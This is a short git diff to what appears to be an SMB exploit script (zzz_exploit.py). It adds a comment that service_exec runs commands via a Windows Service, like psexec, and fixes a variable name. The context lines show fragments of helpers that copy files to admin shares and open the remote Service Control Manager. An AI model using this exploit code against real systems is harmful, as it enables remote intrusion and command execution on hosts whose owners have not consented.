diff --git a/zzz_exploit.py b/zzz_exploit.py
index 695df6a..416a6e3 100644
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -907,6 +907,7 @@ def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
 smbConn.putFile(remoteDrive + '$', remotePath, fp.read)
 # based on impacket/examples/serviceinstall.py
+# Note: using Windows Service to execute command same as how psexec works
 def service_exec(conn, cmd):
 import random
 import string
@@ -918,7 +919,7 @@ def service_exec(conn, cmd):
 rpcsvc = conn.get_dce_rpc('svcctl')
 rpcsvc.connect()
 rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
- svnHandle = None
+ svcHandle = None
 try:
 print("Opening SVCManager on %s....." % conn.get_remote_host())
 resp = scmr.hROpenSCManagerW(rpcsvc)